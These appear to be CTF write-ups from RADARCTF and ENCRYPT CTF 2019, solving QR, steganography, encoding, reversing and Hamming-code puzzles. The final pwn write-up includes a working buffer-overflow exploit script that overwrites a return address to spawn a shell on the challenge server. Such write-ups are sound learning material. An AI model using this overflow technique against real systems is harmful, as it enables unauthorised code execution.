RADARCTF - QRadar(Misc 400)
I found the broken?? QR codes, but it can't read by my iPhone.
Maybe it should be repaired.
http://qr.biz/articles/the_structure_of_qr_code/
I reffered the structure of QR code , and I think
->Timing patterns, Alignment patterns are correct.
-> About Version information and Format information, I can't understand well...
-> So I guess, only Position patterns are missing.
I should prepare the image of Position patterns which match to this QR code.
I used this site.
https://www.cman.jp/QRcode/qr_option/version/
By using this site, I can prepare the sample of QR code which according to the standard of each version.
I think "Version 11(61cells x 61 cells)" is most suitable for this QR code.
So I copy the Position patterns image from the QR code which make at above site,
and paste it to the original image.
Successful reading of QR code, I got the flag.
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxradar{qr_fixing_i5_v3ry_aw3s0me}xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
flag is: radar{qr_fixing_i5_v3ry_aw3s0me}
May be I think there is more stylish solution , but I didn't have the enough time to think it :P
RADARCTF - Black(Misc 200)
The attacked image is just a black...
I use the Stegsolve.jar to analyze it.
So I found the flag image in the lower bit of each color byte.
flag is: radar{reverse_color_give_flag}
RADARCTF - Blanks(Crypto 300)
Open the flag.txt by Text-editor, it seems described only with blanks.
Open the flag.txt by Binary-editor.(I like Stirling.)
There are two character-code pattern. 0x20 and 0x90.
So I replace the character-code as followings.
0x20 -> 0x31(1)
0x90 -> 0x30(0)
Open the replaced file by text-editor,
011100100110000101100100011000010111001001111011011000100110110001100001011011100110101101110011010111110110001001110101011101000101111101101110011011110111010001011111011000100110110001100001011011100110101101111010011111
I can encode it to Ascii characters.
flag is: radar{blanks_but_not_blankz}
RADARCTF - Chars(Crypto 100)
cRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RmRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRFRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRkRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRYRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRXRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRJRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRR7RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRYRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRR2RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRhRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRhRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRcRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRlRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRR9RRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRhRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRRZRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRnRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRlRRRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRcRRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRlRRRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRR9RRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRjRRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRaRRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRGRRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRFRRRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRyRRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRXRRRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRR2RRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRdRRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRpRRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRdRRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRmRRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRVRRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRfRRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRZRRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRmRRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRxRRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRhRRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRZRR
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR3R
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR0
Collecting diagonal characters from top-left to bottom-right.
->cmFkYXJ7Y2hhcl9hZnRlcl9jaGFyX2dpdmVfZmxhZ30
It looks like Base64 encoded string.
Adding '=' to the end of above string for padding, and decode it.
flag is: radar{char_after_char_give_flag}
RADARCTF - EasyReverse(RE 80)
The attached file is .NET Executable.
So analyze this file by using dnspy.
I found "flag()" function.
It builds two strings like flag format.
radar{flagino_flago_flago}
radar{flaginoflago}
I tried to submit both of them, and the 1st one is the flag.
flag is: radar{flagino_flago_flago}
ENCRYPT CTF 2019 - ham-me-baby(Misc 75)
Maybe the problem is replaced ham-me-baby -> ham-me-baby2
The result is an error despite the execution of the ham-me-baby script.
Maybe sometime the CODE which sent from the server is wrong.
So I should detect it and it is necessary to submit the DATA corrected by the Hamming code.
To understanding it, I should read following wiki.
I defined the 7 bits given by CODE as follows.
P1 P2 D1 P3 D2 D3 D4
P:Parity bit / D:Data bit
And I made the judgement syntax referring to this site.
http://www.kmiura.net/archives/4662487.html
D1 XOR D3 XOR D4 XOR P1 = 0 //Syntax1
D1 XOR D2 XOR D4 XOR P2 = 0 //Syntax2
D1 XOR D2 XOR D3 XOR P3 = 0 //Syntax3
if all syntaxes are 1 ->D1 is wrong.
if only Syntax1 is 0 and others are 1 -> D2 is wrong.
if only Syntax2 is 0 and others are 1 -> D3 is wrong.
if only Syntax3 is 0 and others are 1 -> D4 is wrong.
I rewrite the script according to above logic.
Curiously, the logic is correct, but the script result is error...
So I think that the data sequence of CODE is different from what I expected.
I changed the handling of the bits of CODE as following.
P1 P2 D4 P3 D3 D2 D1 -> reverse the sequence of Data bits.
It is correct challenge.
The script is following.
import socket
def humming_validate(code):
d4 = int(code[2])
d3 = int(code[4])
d2 = int(code[5])
d1 = int(code[6])
p1 = int(code[0])
p2 = int(code[1])
p3 = int(code[3])
code_result=code
result1 = d1^d3^d4^p1
result2 = d1^d2^d4^p2
result3 = d1^d2^d3^p3
if result1==1 and result2==1 and result3==1:
#d1 is error
print "d1 is error"
if d1==0:
rep = '1'
else:
rep = '0'
code_result = code_result[:6]+ rep #+code_result[3:]
elif result1==0 and result2==1 and result3==1:
#d2 is error
print "d2 is error"
if d2==0:
rep = '1'
else:
rep = '0'
code_result = code_result[:5]+ rep +code_result[6:]
elif result1==1 and result2==0 and result3==1:
#d3 is error
print "d3 is error"
if d3==0:
rep = '1'
else:
rep = '0'
code_result = code_result[:4]+ rep +code_result[5:]
elif result1==1 and result2==1 and result3==0:
#d4 is error
print "d4 is error"
if d4==0:
rep ='1'
else:
rep ='0'
code_result = code_result[:2]+ rep +code_result[3:]
return code_result
def recvuntil(s, tail):
data = ''
while True:
if tail in data:
return data
data += s.recv(1)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect*1
data = recvuntil(s, 'bits.\n').strip()
print data
data = recvuntil(s, '\n').strip()
print data
#data = recvuntil(s, '\n').strip()
#print data
for i in range(100):
data = recvuntil(s, '\n').strip()
print data
if data == 'CODE VALIDATED':
print 'Round %d' % (i+1)
data = recvuntil(s, '\n').strip()
print data
code = data.split(': ')[1]
code_result = humming_validate(code)
d = code_result[2] + code_result[-3:]
data = recvuntil(s, ': ')
print data + d
s.sendall(d + '\n')
data = recvuntil(s, '\n').strip()
print data
data = recvuntil(s, '\n').strip()
print data
So I got the flag.
flag is: encryptCTF{1t_w4s_h4rd3r_th4n_1_th0ught}
*1:'104.154.106.182', 6969
ENCRYPT CTF 2019 - pwn1(Pwn 50)
First of all, I decoded it by using GHIDRA!!
- main() function has the BoF vulnerability (There are no length check, and it uses gets/puts)
- shell() function calls "/bin/sh".
So the tactic is, overwrite the return-address by the address of shell() -> 0x80484b3
Step1: Identify the position of the return-address.
-> Execute the pwn1 on gdb , and I input these string.
Tell me your name: 0123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899
->Segmentation fault occured on 0x36373537
It means,the return address appears after a 140-character redundant string.
Step2: Write the script to win.
Followings are my script.
# coding:utf-8
from pwn import remote, p32
host = "104.154.106.182"
port = 2345
r = remote(host, port)
r.recvuntil("Tell me your name: ")
code = "A" * 140 # dummy
code += p32(0x80484b3)
print(code)
r.sendline(code)
r.interactive()
I got following result.
flag is: encryptCTF{Buff3R_0v3rfl0W5_4r3_345Y}
This is first time I got the PWN flag after join in my team.
Congrats to me ^^